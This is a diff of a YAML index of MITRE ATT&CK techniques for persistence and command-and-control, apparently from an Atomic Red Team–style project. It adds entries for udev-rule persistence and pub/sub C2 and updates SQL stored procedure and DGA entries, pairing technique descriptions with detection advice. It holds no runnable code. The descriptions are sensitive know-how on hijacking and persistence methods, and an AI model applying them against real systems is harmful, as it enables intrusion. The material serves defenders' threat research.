-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -37171,9 +37550,65 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+    atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.007:
     technique:
@@ -37210,7 +37645,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -37234,51 +37669,11 @@ persistence:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1505.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Carlos Borges, @huntingneo, CIP
-      - Lucas da Silva Pereira, @vulcanunsec, CIP
-      - Kaspersky
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
-      type: attack-pattern
-      created: '2019-12-12T14:59:58.168Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.001
-        url: https://attack.mitre.org/techniques/T1505/001
-      - source_name: NetSPI Startup Stored Procedures
-        url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
-        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
-          SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
-      - source_name: Kaspersky MSSQL Aug 2019
-        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
-        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
-          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
-      - source_name: Microsoft xp_cmdshell 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
-        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
-          September 9, 2019.
-      - source_name: Microsoft CLR Integration 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
-        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
-          Retrieved July 8, 2019.
-      - source_name: NetSPI SQL Server CLR
-        url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
-        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
-          Retrieved July 8, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-15T16:05:24.007Z'
       name: SQL Stored Procedures
       description: "Adversaries may abuse SQL stored procedures to establish persistent
         access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -37301,20 +37696,57 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Carlos Borges, @huntingneo, CIP
+      - Lucas da Silva Pereira, @vulcanunsec, CIP
+      - Kaspersky
+      x_mitre_deprecated: false
       x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
         NetSPI Startup Stored Procedures) Consider enabling audit features that can
         log malicious startup activities.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+      created: '2019-12-12T14:59:58.168Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/001
+        external_id: T1505.001
+      - source_name: Microsoft CLR Integration 2017
+        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+          Retrieved July 8, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+      - source_name: Microsoft xp_cmdshell 2017
+        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+          September 9, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+      - source_name: Kaspersky MSSQL Aug 2019
+        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+      - source_name: NetSPI Startup Stored Procedures
+        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+          SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+          2024.'
+        url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+      - source_name: NetSPI SQL Server CLR
+        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+          Retrieved September 12, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.004:
     technique:
@@ -37344,7 +37776,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -37368,12 +37800,10 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -37457,11 +37887,10 @@ persistence:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -37513,9 +37942,8 @@ persistence:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -37564,7 +37992,7 @@ persistence:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -37602,14 +38030,12 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 command-and-control:
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -37672,7 +38098,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.001:
     technique:
@@ -37730,97 +38155,95 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1132.001
     atomic_tests: []
   T1568.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T15:55:16.111Z'
+      name: Domain Generation Algorithms
+      description: |-
+        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
       x_mitre_contributors:
       - Ryan Benson, Exabeam
       - Barry Shteiman, Exabeam
       - Sylvain Gil, Exabeam
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
       type: attack-pattern
+      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
       created: '2020-03-10T17:44:59.787Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1568.002
         url: https://attack.mitre.org/techniques/T1568/002
-      - source_name: Cybereason Dissecting DGAs
-        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
-        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
-          Eight Real World DGA Variants. Retrieved February 18, 2019.'
-      - source_name: Cisco Umbrella DGA
-        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
-        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
-          Why so effective?. Retrieved February 18, 2019.
-      - source_name: Unit 42 DGA Feb 2019
-        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
-        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
-          Generation Algorithms (DGA). Retrieved February 19, 2019.'
-      - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+        external_id: T1568.002
+      - source_name: Elastic Predicting DGA
+        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+          Networks. Retrieved April 26, 2019.
+        url: https://arxiv.org/pdf/1611.00791.pdf
+      - source_name: Talos CCleanup 2017
         description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
           Number of Machines at Risk. Retrieved March 9, 2018.'
-        source_name: Talos CCleanup 2017
-      - source_name: Akamai DGA Mitigation
-        url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
-        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
-          Domain Generation Algorithms. Retrieved February 18, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+        url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+      - source_name: Pace University Detecting DGA May 2017
+        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+          April 26, 2019.
+        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+      - source_name: FireEye POSHSPY April 2017
         description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
           WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
-        source_name: FireEye POSHSPY April 2017
+        url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
       - source_name: ESET Sednit 2017 Activity
-        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
         description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
           the Year. Retrieved February 18, 2019.'
+        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
       - source_name: Data Driven Security DGA
-        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      - source_name: Pace University Detecting DGA May 2017
-        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
-        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
-          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
-          April 26, 2019.
-      - source_name: Elastic Predicting DGA
-        url: https://arxiv.org/pdf/1611.00791.pdf
-        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
-          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
-          Networks. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Domain Generation Algorithms
-      description: |-
-        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
-        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
-        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: command-and-control
-      x_mitre_detection: |-
-        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
-        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+      - source_name: Akamai DGA Mitigation
+        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+          Domain Generation Algorithms. Retrieved February 18, 2019.
+        url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+      - source_name: Cisco Umbrella DGA
+        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+          Why so effective?. Retrieved February 18, 2019.
+        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+      - source_name: Cybereason Dissecting DGAs
+        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+          Eight Real World DGA Variants. Retrieved February 18, 2019.'
+        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+      - source_name: Unit 42 DGA Feb 2019
+        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+          Generation Algorithms (DGA). Retrieved February 19, 2019.'
+        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.004:
     technique:
@@ -37886,9 +38309,67 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.004
     atomic_tests: []
+  T1071.005:
+    technique:
+      modified: '2024-10-16T13:08:35.629Z'
+      name: Publish/Subscribe Protocols
+      description: "Adversaries may communicate using publish/subscribe (pub/sub)
+        application layer protocols to avoid detection/network filtering by blending
+        in with existing traffic. Commands to the remote system, and often the results
+        of those commands, will be embedded within the protocol traffic between the
+        client and server. \n\nProtocols such as <code>MQTT</code>, <code>XMPP</code>,
+        <code>AMQP</code>, and <code>STOMP</code> use a publish/subscribe design,
+        with message distribution managed by a centralized broker.(Citation: wailing
+        crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+        messages by topics, while subscribers receive messages according to their
+        subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+        publish/subscribe protocols to communicate with systems under their control
+        from behind a message broker while also mimicking normal, expected traffic."
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      x_mitre_contributors:
+      - Domenico Mazzaferro Palmeri
+      - Sofia Sanchez Margolles
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Network Traffic: Network Traffic Content'
+      type: attack-pattern
+      id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+      created: '2024-08-28T14:14:18.512Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1071/005
+        external_id: T1071.005
+      - source_name: wailing crab sub/pub
+        description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+          21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+          August 28, 2024.
+        url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+      - source_name: Mandiant APT1 Appendix
+        description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+          Retrieved July 18, 2016.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1573.001:
     technique:
       modified: '2023-12-26T20:58:19.356Z'
@@ -37934,7 +38415,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1568.001:
     technique:
@@ -37966,7 +38446,7 @@ command-and-control:
         url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
         description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
           are they and how do they work?. Retrieved March 11, 2020.'
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T16:10:37.183Z'
       name: Fast Flux DNS
       description: |-
         Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -37988,22 +38468,20 @@ command-and-control:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071:
     technique:
-      modified: '2024-01-17T22:52:23.454Z'
+      modified: '2024-08-28T14:10:33.145Z'
       name: Application Layer Protocol
